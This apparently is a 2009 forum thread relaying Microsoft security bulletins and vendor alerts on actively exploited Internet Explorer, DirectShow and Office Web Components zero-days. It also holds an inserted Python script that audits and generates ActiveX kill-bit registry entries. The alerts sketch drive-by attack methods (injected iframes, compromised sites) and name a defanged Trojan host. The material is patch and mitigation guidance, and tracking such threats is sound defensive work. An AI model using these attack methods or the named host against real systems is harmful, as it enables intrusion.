- http://www.microsoft.com/technet/security/Bulletin/MS09-jun.mspx
June 9, 2009 - "This bulletin summary lists security bulletins released for June 2009... The following table summarizes the security bulletins for this month in order of severity... (Total of -10-)

Critical -6-

Microsoft Security Bulletin MS09-018
Vulnerabilities in Active Directory Could Allow Remote Code Execution (971055)
- http://www.microsoft.com/technet/security/bulletin/MS09-018.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution, Denial of Service
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-022
Vulnerabilities in Windows Print Spooler Could Allow Remote Code Execution (961501)
- http://www.microsoft.com/technet/security/bulletin/MS09-022.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-019
Cumulative Security Update for Internet Explorer (969897)
- http://www.microsoft.com/technet/security/bulletin/MS09-019.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Internet Explorer ...
- http://atlas.arbor.net/briefs/
"...major update to IE 6, 7 and 8 for all platforms. This could affect thousands of users and, as we have seen, be used in drive by attacks for years to come. Source: MS09-019 ..."

Microsoft Security Bulletin MS09-027
Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (969514)
- http://www.microsoft.com/technet/security/bulletin/MS09-027.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS09-021
Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (969462)
- http://www.microsoft.com/technet/security/bulletin/MS09-021.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS09-024
Vulnerability in Microsoft Works Converters Could Allow Remote Code Execution (957632)
- http://www.microsoft.com/technet/security/bulletin/MS09-024.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Important -3-

Microsoft Security Bulletin MS09-026
Vulnerability in RPC Could Allow Elevation of Privilege (970238)
- http://www.microsoft.com/technet/security/bulletin/MS09-026.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-025
Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (968537)
- http://www.microsoft.com/technet/security/bulletin/MS09-025.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-020
Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483)
- http://www.microsoft.com/technet/security/bulletin/MS09-020.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Moderate -1-

Microsoft Security Bulletin MS09-023
Vulnerability in Windows Search Could Allow Information Disclosure (963093)
- http://www.microsoft.com/technet/security/bulletin/MS09-023.mspx
Maximum Severity Rating: Moderate
Vulnerability Impact: Information Disclosure
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=6538
Last Updated: 2009-06-10 13:01:38 UTC ...(Version: 2)
___

- http://www.reuters.com/article/technologyNews/idUSTRE5585IV20090609?sp=true
Jun 9, 2009 - "Microsoft Corp issued software to fix 31 security flaws in its programs, a single-day record for the company whose products are targeted by hackers because they sit on the vast majority of computers..."
___

MSRT
- http://www.microsoft.com/security/malwareremove/default.mspx
Version: 2.11
Knowledge Base (KB) Articles: http://support.microsoft.com/?kbid=890830
Date Published: 6/9/2009 ...
Recent adds:
Win32/Waledac - April 2009 (V 2.9) Moderate
Win32/Winwebsec - May 2009 (V 2.10) Moderate
Win32/InternetAntivirus - June 2009 (V 2.11) Moderate

AplusWebMaster
2009-06-10, 19:28
FYI...

Microsoft Security Advisory (971888)
Update for DNS Devolution
- http://www.microsoft.com/technet/security/advisory/971888.mspx
Published or Last Updated: 6/9/2009

Microsoft Security Advisory (971492)
Vulnerability in Internet Information Services Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/971492.mspx
Published: May 18, 2009 | Updated: June 9, 2009 - "... We have issued MS09-020 to address this issue..." - http://www.microsoft.com/technet/security/Bulletin/MS09-020.mspx

Microsoft Security Advisory (969898)
Update Rollup for ActiveX Kill Bits
- http://www.microsoft.com/technet/security/advisory/969898.mspx
June 9, 2009 - "Microsoft is releasing a new set of ActiveX kill bits with this advisory.
The update includes a kill bit from a previously published Microsoft Cumulative Update:
• Microsoft Visual Basic 6.0 Service Pack 6 Cumulative Update (KB957924)
- http://www.microsoft.com/downloads/details.aspx?FamilyID=cb824e35-0403-45c4-9e41-459f0eb89e36&displaylang=en
The update also includes kill bits for the following third-party software:
• Derivco. This security update sets a kill bit for an ActiveX control developed by Derivco. Derivco has released a security update that addresses a vulnerability in the affected component. For more information and download locations, see the security release from Derivco. This kill bit is being set at the request of the owner of the ActiveX controls...
• eBay Advanced Image Upload Component. This security update sets a kill bit for an ActiveX control developed by eBay. eBay has released a security update that addresses a vulnerability in the affected component. For more information and download locations, see the security release from eBay. This kill bit is being set at the request of the owner of the ActiveX controls...
• HP Virtual Room v7.0. This security update sets a kill bit for an ActiveX control developed by Research In Motion (RIM). RIM has released a security update that addresses a vulnerability in the affected component. For more information and download locations, see the security release from HP. This kill bit is being set at the request of the owner of the ActiveX controls..."

Microsoft Security Advisory (945713)
Vulnerability in Web Proxy Auto-Discovery (WPAD) Could Allow Information Disclosure
- http://www.microsoft.com/technet/security/advisory/945713.mspx
Published: December 3, 2007 | Updated: June 9, 2009 - "... We have issued MS09-008 to address the WPAD issue and have released configuration guidance and updates for DNS devolution in Microsoft Security Advisory 971888. The vulnerabilities addressed are DNS Server Vulnerability in WPAD Registration Vulnerability CVE-2009-0093 and WPAD WINS Server Registration Vulnerability CVE-2009-0094..."
- http://www.microsoft.com/technet/security/Bulletin/MS09-008.mspx
- http://www.microsoft.com/technet/security/advisory/971888.mspx
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0093
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0094

:fear:

AplusWebMaster
2009-06-20, 02:48
FYI...

DirectShow Exploit In the Wild, Part II
- http://preview.tinyurl.com/lhmtkd
06-19-2009 Symantec Security Response Blog - "... With no patch for this vulnerability available as of yet, the fact that we are seeing this exploit used more commonly in the wild is worrying... To trigger this vulnerability, attackers are currently enticing users to visit a malicious page. Attackers have become quite adept at doing this by embedding iframe tags in legitimate pages, among other techniques. This is the most likely attack vector. We have seen iframe tags pointing to this exploit inside phishing pages already and we do expect to see iframe tags added to more pages. The vulnerability exists in the code within Microsoft DirectX and can be triggered by a specially crafted QuickTime media file. The attacker's Web page will try to play the malicious QuickTime file, not using the QuickTime player, but using Windows Media Player instead. This will trigger the vulnerability and allow the attacker to execute code on the visitor's computer. The vulnerable code exists in quartz.dll and is a null-byte overwrite. It allows the attacker to overwrite just one byte of memory with a null byte... (end-user) work-around*."
* http://support.microsoft.com/kb/971778#FixItForMeAlways
June 3, 2009 (Get the Enable Workaround "FixIt" here. MUST be run in Admin mode.)

- http://www.microsoft.com/technet/security/advisory/971778.mspx

> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1537
Last revised: 06/09/2009
CVSS v2 Base Score: 9.3 (HIGH)
Impact Type: Allows unauthorized disclosure of information; Allows unauthorized modification; Allows disruption of service...

:fear::mad:

AplusWebMaster
2009-07-06, 15:18
FYI...

0-day in MS DirectShow (msvidctl.dll) used in drive-by attacks
- http://isc.sans.org/diary.html?storyid=6733
Last Updated: 2009-07-06 08:56:55 UTC - "A 0-day exploit within the msVidCtl component of Microsoft DirectShow is actively being exploited through drive-by attacks using thousands of newly compromised web sites, according to CSIS. The code has been published in the public domain via a number of Chinese web sites. Please keep a watchful eye on your AV and IDS/IPS vendors updates to ensure coverage as early as possible on this exploit as it is likely to be widely deployed with the code being available. A valid work around for the attack vector is available which sets the kill bit on the vulnerable DLL.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400 ..."

- http://securitylabs.websense.com/content/Alerts/3432.aspx
07.06.2009 - "Websense... is currently tracking -legitimate- sites that have been compromised to lead to a zero-day exploit targeting an Internet Explorer vulnerability. The compromised sites lead to a handful of payload sites hosting the exploit code which targets msvidctl.dll - an ActiveX control for streaming video. The new zero-day exploit has been added to other exploits on Chinese payload sites. We have been monitoring these sites, which have been systematically injected throughout the last year..."

- http://secunia.com/advisories/35683/2/
Release Date: 2009-07-06
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched
OS: Microsoft Windows XP Home Edition, Microsoft Windows XP Professional ...
... The vulnerability is caused due to a boundary error in the ActiveX control for streaming video (msvidctl.dll) and can be exploited to cause a stack-based buffer overflow via specially crafted image content.
Successful exploitation allows execution of arbitrary code when a user e.g. visits a malicious website.
NOTE: The vulnerability is currently being actively exploited...
Solution: Set the kill-bit for the affected ActiveX control...

- http://www.f-secure.com/weblog/archives/00001716.html
July 6, 2009 - "... The exploit targets Microsoft Internet Explorer… so one work around is kind of obvious. Use some other browser besides Internet Explorer until this vulnerability is patched..."

>>> http://support.microsoft.com/kb/972890#FixItForMe
July 6, 2009 (Get the Enable Workaround "FixIt" here. MUST be run in Admin mode.)

:fear:
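As an added example (my own code, not the ISC diary's and not a Microsoft tool), the Python below audits an exported .reg file of the ActiveX Compatibility key and reports whether a given CLSID carries the kill bit (the 0x400 flag in "Compatibility Flags"), and it generates the same kind of .reg text for a list of CLSIDs so a workaround can be reviewed before it is imported. The first CLSID is the msvidctl.dll class identifier quoted in the post; the second CLSID and the whole sample .reg text are constructed for the demo.

```python
"""Audit and generate ActiveX kill-bit entries in .reg export format.

Added example, not from the forum post or from Microsoft. The first CLSID
below is the one quoted in the ISC diary; the second CLSID and the .reg
text are constructed to exercise the parser.
"""
import re

KILL_BIT = 0x00000400  # "Compatibility Flags" bit that blocks a control in IE
COMPAT_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer"
              r"\ActiveX Compatibility")

_KEY_RE = re.compile(r"^\[(?P<path>[^\]]+)\]\s*$")
_VAL_RE = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<hex>[0-9a-fA-F]{8})\s*$')
_CLSID_RE = re.compile(
    r"^\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")

# Constructed sample: one control with the kill bit, one with a different
# compatibility flag only (placeholder CLSID, not a real control).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000000-0000-0000-0000-000000000001}]
"Compatibility Flags"=dword:00000001
"""


def parse_reg(text):
    """Return {CLSID: compatibility flags} for every ActiveX Compatibility
    subkey in a .reg export. Subkeys without a dword flag map to None.
    Real Version 5.00 exports are UTF-16 LE; decode them before calling."""
    entries = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = _KEY_RE.match(line)
        if m:
            path = m.group("path")
            current = None
            if path.lower().startswith(COMPAT_KEY.lower() + "\\"):
                clsid = path.rsplit("\\", 1)[1].upper()
                if _CLSID_RE.match(clsid):
                    current = clsid
                    entries.setdefault(current, None)
            continue
        m = _VAL_RE.match(line)
        if m and current and m.group("name").lower() == "compatibility flags":
            entries[current] = int(m.group("hex"), 16)
    return entries


def kill_bit_status(text, clsids):
    """True for each CLSID whose flags include the kill bit, else False.
    The test is bitwise, so a value combining 0x400 with other flags counts."""
    flags = parse_reg(text)
    return {c.upper(): bool((flags.get(c.upper()) or 0) & KILL_BIT)
            for c in clsids}


def build_kill_bit_reg(clsids):
    """Emit .reg text that sets the kill bit for every CLSID given."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for c in clsids:
        lines.append(f"[{COMPAT_KEY}\\{c.upper()}]")
        lines.append(f'"Compatibility Flags"=dword:{KILL_BIT:08x}')
        lines.append("")
    return "\r\n".join(lines)


if __name__ == "__main__":
    for clsid, killed in kill_bit_status(SAMPLE_REG, parse_reg(SAMPLE_REG)).items():
        print(f"{clsid}: {'kill bit set' if killed else 'NOT kill-bitted'}")
    print(build_kill_bit_reg(["{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}"]))
```

Because the check is bitwise, a control whose "Compatibility Flags" value combines 0x400 with other flags is still reported as killed; a control whose subkey exists but carries a different flag, or no subkey at all, is reported as not killed. The same listing shows which CLSIDs currently carry a workaround kill bit, which matters later when a vendor update replaces the workaround.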

AplusWebMaster
2009-07-06, 22:20
FYI...

Microsoft Security Advisory (972890)
Vulnerability in Microsoft Video ActiveX Control Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/972890.mspx
July 06, 2009 - "Microsoft is investigating a privately reported vulnerability in Microsoft Video ActiveX Control. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. When using Internet Explorer, code execution is remote and may not require any user intervention. We are aware of attacks attempting to exploit the vulnerability.
Our investigation has shown that there are no by-design uses for this ActiveX Control in Internet Explorer which includes all of the Class Identifiers within the msvidctl.dll that hosts this ActiveX Control. For Windows XP and Windows Server 2003 customers, Microsoft is recommending removing support for this ActiveX Control within Internet Explorer using all the Class Identifiers listed in the Workaround section. Though unaffected by this vulnerability, Microsoft is recommending that Windows Vista and Windows Server 2008 customers remove support for this ActiveX Control within Internet Explorer using the same Class Identifiers as a defense-in-depth measure. Customers may prevent the Microsoft Video ActiveX Control from running in Internet Explorer, either manually using the instructions in the Workaround section or automatically using the solution found in Microsoft Knowledge Base Article 972890*..."
* http://support.microsoft.com/kb/972890#FixItForMe
July 6, 2009 (Get the Enable Workaround "FixIt" here. MUST be run in Admin mode.)

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0015
Last revised: 07/09/2009
CVSS v2 Base Score: 9.3 (HIGH)
Impact Type: Provides administrator access, Allows complete confidentiality, integrity, and availability violation; Allows unauthorized disclosure of information; Allows disruption of service ...

- http://securitylabs.websense.com/content/Blogs/3434.aspx
07.09.2009

:fear:

AplusWebMaster
2009-07-07, 13:14
FYI...

IE 0day exploit domains...
- http://isc.sans.org/diary.html?storyid=6739
Last Updated: 2009-07-07 02:33:54 UTC - "This diary entry contains a list of domains that are exploiting the new IE-0day as well as secondary domains that are hosting potentially malicious binaries utilized in these attacks. This list has been produced as a combined effort of researchers, vendors, and volunteers. You can thank the groups below for their efforts and their willingness to share this information with the public. This list is intended to serve as a quick way to provide protection against these attacks by identifying domains that are hosting these (and potentially other) exploits. This list is not formatted for any specific file format, it is up to you the reader to translate this data into the proper formatting that your environment requires... The information provided has had varying degrees of verification performed on it. As such this information is provided as is. There may very well be mistakes, mistakes that may result in legitimate sites being blocked if you choose to use this list as a block list..."

:fear:

AplusWebMaster
2009-07-07, 15:40
FYI...

0-day exploit leads to KILLAV
- http://blog.trendmicro.com/zero-day-microsoft-directshow-mpeg2tunerequest-exploit-leads-to-killav-malware/
July 6, 2009 - "... Around 967 Chinese websites are reported to be infected by a malicious script that leads users to successive site redirections and lands them to download a .JPG file containing the exploit. Trend Micro detects it as JS_DLOADER.BD... Upon successful exploitation, the script downloads another malware detected as WORM_KILLAV.AI. This malware disables and terminates antivirus software processes, and drops other malware on the affected system..."
(Screenshots available at the URL above.)

Edit/update - see: http://secunia.com/advisories/35683/2/
Last Update: 2009-07-14
Solution Status: Vendor Patch
MS09-032 (KB973346):
http://www.microsoft.com/technet/security/Bulletin/MS09-032.mspx ...

:fear::spider::fear:

AplusWebMaster
2009-07-13, 18:33
FYI...

Microsoft Security Advisory (973472)
Vulnerability in Microsoft Office Web Components Control Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973472.mspx
July 13, 2009 - "Microsoft is investigating a privately reported vulnerability in Microsoft Office Web Components. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. When using Internet Explorer, code execution is remote and may not require any user intervention. We are aware of attacks attempting to exploit the vulnerability. Customers may prevent the Microsoft Office Web Components from running in Internet Explorer either manually, using the instructions in the Workaround section, or automatically, using the solution found in Microsoft Knowledge Base Article 973472*..."
* http://support.microsoft.com/kb/973472#FixItForMe
July 13, 2009 - Revision: 1.2

- http://secunia.com/advisories/35800/2/
Release Date: 2009-07-13
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched
Solution: Set the kill-bit for the affected ActiveX control.
Provided and/or discovered by: Reported as a 0-day...

- http://isc.sans.org/diary.html?storyid=6778
Last Updated: 2009-07-14 01:35:23 UTC ...(Version: 8) - "... This vulnerability exists in the ActiveX control used by IE to display Excel spreadsheets... we are seeing active exploit pages... Start working on this ASAP. The impact is remote code execution with the privileges of the logged in user running Internet Explorer, and might not require user intervention. As in browse to a nasty web site and be pwn3d..."

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1136

:fear:

AplusWebMaster
2009-07-14, 21:29
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-jul.mspx
July 14, 2009 - "This bulletin summary lists security bulletins released for July 2009...
(Total of -6-)

Critical -3-

Microsoft Security Bulletin MS09-029
Vulnerabilities in the Embedded OpenType Font Engine Could Allow Remote Code Execution (961371)
- http://www.microsoft.com/technet/security/bulletin/MS09-029.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-028
Vulnerabilities in Microsoft DirectShow Could Allow Remote Code Execution (971633)
- http://www.microsoft.com/technet/security/bulletin/MS09-028.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-032
Cumulative Security Update of ActiveX Kill Bits (973346)
- http://www.microsoft.com/technet/security/bulletin/MS09-032.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows...

Important -3-

Microsoft Security Bulletin MS09-033
Vulnerability in Virtual PC and Virtual Server Could Allow Elevation of Privilege (969856)
- http://www.microsoft.com/technet/security/bulletin/MS09-033.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Virtual PC, Virtual Server...

Microsoft Security Bulletin MS09-031
Vulnerability in Microsoft ISA Server 2006 Could Cause Elevation of Privilege (970953)
- http://www.microsoft.com/technet/security/bulletin/MS09-031.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft ISA Server...

Microsoft Security Bulletin MS09-030
Vulnerability in Microsoft Publisher Could Allow Remote Code Execution (969516)
- http://www.microsoft.com/technet/security/bulletin/MS09-030.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=6790
Last Updated: 2009-07-14 17:34:08 UTC - "...MS09-032 - Note there are recently discovered killbits one should set that are -not- included in this update..." (See: http://support.microsoft.com/kb/973472#FixItForMe - July 14, 2009)
___

MSRT
- http://support.microsoft.com/?kbid=890830
Release Date: July 14, 2009
(Recent additions)
Win32/Winwebsec May 2009 (V 2.10) Moderate
Win32/InternetAntivirus June 2009 (V 2.11) Moderate
Win32/FakeSpypro July 2009 (V 2.12) Moderate

AplusWebMaster
2009-07-16, 12:58
FYI...

Microsoft Security Bulletin MS09-032 - Critical
Cumulative Security Update of ActiveX Kill Bits (973346)
- http://www.microsoft.com/technet/security/bulletin/ms09-032.mspx
Published: July 14, 2009 | Updated: July 15, 2009
"... Frequently Asked Questions (FAQ) Related to This Security Update
If I have applied the workaround from Microsoft Security Advisory 972890, do I need to install this security update?
Microsoft Security Advisory 972890 describes a workaround that prevents the Microsoft Video ActiveX Control from running in Internet Explorer. Customers can either manually apply this workaround or use the automated Microsoft Fix it solution in Microsoft Knowledge Base Article 972890 to enable the workaround. Customers who have applied this workaround using either method do -not- need to install this security update.
... Customers who want this update to be offered to Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems must remove the kill bit settings previously applied by the workaround by deleting the registry keys referenced in the workaround, "Prevent COM objects from running in Internet Explorer."
• V1.1 (July 15, 2009): Clarified a FAQ about the workaround from Microsoft Security Advisory 972890, added a FAQ about Microsoft Security Advisory 973472, and added a FAQ about the kill bits contained in this bulletin.

- http://windowssecrets.com/2009/07/16/07-Killbit-update-requires-Fix-it-undo-for-XP-PCs
July 16, 2009 - "... Anyone who applied the Fix-it workaround won't see the cumulative patch among the updates being offered to XP systems because the workaround removed the affected Registry keys."

AplusWebMaster
2009-07-28, 02:11
FYI...

MS OWC vuln used in site compromise
- http://securitylabs.websense.com/content/Alerts/3451.aspx
07.27.2009 - "Websense... has discovered that the Center for Defense Information (CDI) Web site has been compromised. The site is injected with a JavaScript code that exploits the latest Microsoft Office Web Components Control vulnerability... The vulnerability is in the Internet Explorer ActiveX control used to display Excel spreadsheets (CVE-2009-1136)... The exploit code pushes a Trojan from hxxp ://vicp .cc/. The Trojan has more than 50% detection*. Note that Microsoft provides a workaround for the problem in their Fixit** program..."

* http://www.virustotal.com/analisis/0ef75757f2f8e8a4ea1aa4288d52eb2deb8b9df804af33da9f0ef3baee60138c-1248724806
File solar.exe received on 2009.07.27 20:00:06 (UTC)
Result: 24/41 (58.54%)

** http://support.microsoft.com/kb/973472#FixItForMe

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1136
Last revised: 07/16/2009
CVSS v2 Base Score: 9.3 (HIGH)

:mad:

AplusWebMaster
2009-07-28, 20:38
FYI...

Microsoft Security Advisory (973882)
Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973882.mspx
July 28, 2009 - "Microsoft is releasing this security advisory to provide information about our ongoing investigation into vulnerabilities in the public and private versions of Microsoft's Active Template Library (ATL). This advisory also provides guidance as to what developers can do to help ensure that the controls and components they have built are not vulnerable to the ATL issues; what IT Professionals and consumers can do to mitigate potential attacks that use the vulnerabilities; and what Microsoft is doing as part of its ongoing investigation into the issue described in this advisory. This security advisory will also provide a comprehensive listing of all Microsoft Security Bulletins and Security Updates related to the vulnerabilities in ATL. Microsoft's investigation into the private and public versions of ATL is ongoing, and we will release security updates and guidance as appropriate as part of the investigation process...
Updates related to ATL: Updates released on July 28, 2009...

Microsoft Security Bulletin MS09-034 - Critical
Cumulative Security Update for Internet Explorer (972260)
- http://www.microsoft.com/technet/security/bulletin/ms09-034.mspx
July 28, 2009

Microsoft Security Bulletin MS09-035 - Moderate
Vulnerabilities in Visual Studio Active Template Library Could Allow Remote Code Execution (969706)
- http://www.microsoft.com/technet/security/bulletin/ms09-035.mspx
July 28, 2009

- http://www.microsoft.com/technet/security/bulletin/ms09-jul-ans.mspx
• V2.0 (July 28, 2009): Added Microsoft Security Bulletins MS09-034, Cumulative Security Update for Internet Explorer (972260), and MS09-035, Vulnerabilities in Visual Studio Active Template Library Could Allow Remote Code Execution (969706). Also added the bulletin webcast links for these out-of-band security bulletins.
___

- http://isc.sans.org/diary.html?storyid=6874
Last Updated: 2009-07-28 17:19:30 UTC ...(Version: 2)
___

- http://secunia.com/advisories/35962/2/
Release Date: 2009-07-28
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch
Software: Microsoft Internet Explorer v5 - v8 ...
Solution: Apply patches...
Original Advisory: MS09-034 (KB972260):
http://www.microsoft.com/technet/security/Bulletin/MS09-034.mspx
Other References: Microsoft Security Advisory (KB973882):
http://www.microsoft.com/technet/security/advisory/973882.mspx ...

- http://secunia.com/advisories/35967/2/
Release Date: 2009-07-28
Critical: Moderately critical
Impact: System access, Exposure of sensitive information, Security Bypass
Where: From remote
Solution Status: Vendor Patch
Software: Microsoft Visual C++ (multiple versions), Microsoft Visual Studio (multiple versions)...
Original Advisory: MS09-035 (KB969706, KB971089, KB971090, KB971091, KB971092, KB973544, KB973551, KB973552, KB973830):
http://www.microsoft.com/technet/security/Bulletin/MS09-035.mspx ...

- http://www.sophos.com/blogs/sophoslabs/v/post/5627
July 28, 2009 - "...MS09-035 fixes the actual ATL code included with several versions of Microsoft Visual Studio so that the new ActiveX components compiled with the fixed ATL code are not affected by the incorrect pointer passing vulnerability in CComVariant::ReadFromStream function. Developers of ActiveX components that use ATL are advised to recompile and update their components using the fixed version of the Active Template Library..."

AplusWebMaster
2009-08-11, 20:41
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-aug.mspx
August 11, 2009 - "This bulletin summary lists security bulletins released for August 2009... (Total of -9-)

Critical -5-

Microsoft Security Bulletin MS09-043
Vulnerabilities in Microsoft Office Web Components Could Allow Remote Code Execution (957638)
- http://www.microsoft.com/technet/security/bulletin/ms09-043.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office, Microsoft Visual Studio, Microsoft ISA Server, Microsoft BizTalk Server...

Microsoft Security Bulletin MS09-044
Vulnerabilities in Remote Desktop Connection Could Allow Remote Code Execution (970927)
- http://www.microsoft.com/technet/security/bulletin/MS09-044.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Remote Desktop Connection Client for Mac...

Microsoft Security Bulletin MS09-039
Vulnerabilities in WINS Could Allow Remote Code Execution (969883)
- http://www.microsoft.com/technet/security/bulletin/MS09-039.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-038
Vulnerabilities in Windows Media File Processing Could Allow Remote Code Execution (971557)
- http://www.microsoft.com/technet/security/bulletin/MS09-038.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-037
Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution (973908)
- http://www.microsoft.com/technet/security/bulletin/MS09-037.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Important -4-

Microsoft Security Bulletin MS09-041
Vulnerability in Workstation Service Could Allow Elevation of Privilege (971657)
- http://www.microsoft.com/technet/security/bulletin/MS09-041.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-040
Vulnerability in Message Queuing Could Allow Elevation of Privilege (971032)
- http://www.microsoft.com/technet/security/bulletin/MS09-040.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-036
Vulnerability in ASP.NET in Microsoft Windows Could Allow Denial of Service (970957)
- http://www.microsoft.com/technet/security/bulletin/MS09-036.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Denial of Service
Restart Requirement: Does not require restart
Affected Software: Microsoft Windows, Microsoft .NET Framework...

Microsoft Security Bulletin MS09-042
Vulnerability in Telnet Could Allow Remote Code Execution (960859)
- http://www.microsoft.com/technet/security/bulletin/MS09-042.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...
___

Severity and Exploitability Index (chart)
- http://blogs.technet.com/photos/msrcteam/images/3272462/original.aspx
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=6937
Last Updated: 2009-08-11 19:22:14 UTC
___

MSRT
- http://support.microsoft.com/?kbid=890830
Release Date: 8/11/2009
(Recent additions)
Win32/InternetAntivirus June 2009 (V 2.11) Moderate
Win32/FakeSpypro July 2009 (V 2.12) Moderate
Win32/FakeRean August 2009 (V 2.13) Moderate

AplusWebMaster
2009-08-12, 14:21
FYI...

Microsoft Security Advisory (973882)
Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973882.mspx
Published: July 28, 2009 | Updated: August 11, 2009 - "...Updates related to ATL:
- Updates released on August 11, 2009
• MS09-037 - Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/bulletin/ms09-037.mspx
• MS09-035 - Vulnerabilities in Visual Studio Active Template Library Could Allow Remote Code Execution
Published: July 28, 2009 | Updated: August 11, 2009
http://www.microsoft.com/technet/security/bulletin/ms09-035.mspx
- Updates released on July 28, 2009
• MS09-035 - Vulnerabilities in Visual Studio Active Template Library Could Allow Remote Code Execution
• MS09-034 - Cumulative Security Update for Internet Explorer
http://www.microsoft.com/technet/security/bulletin/ms09-034.mspx
- Update released on July 14, 2009
• MS09-032 - Cumulative Security Update of ActiveX Kill Bits
http://www.microsoft.com/technet/security/bulletin/ms09-032.mspx
___

Microsoft Security Advisory (973811)
Extended Protection for Authentication
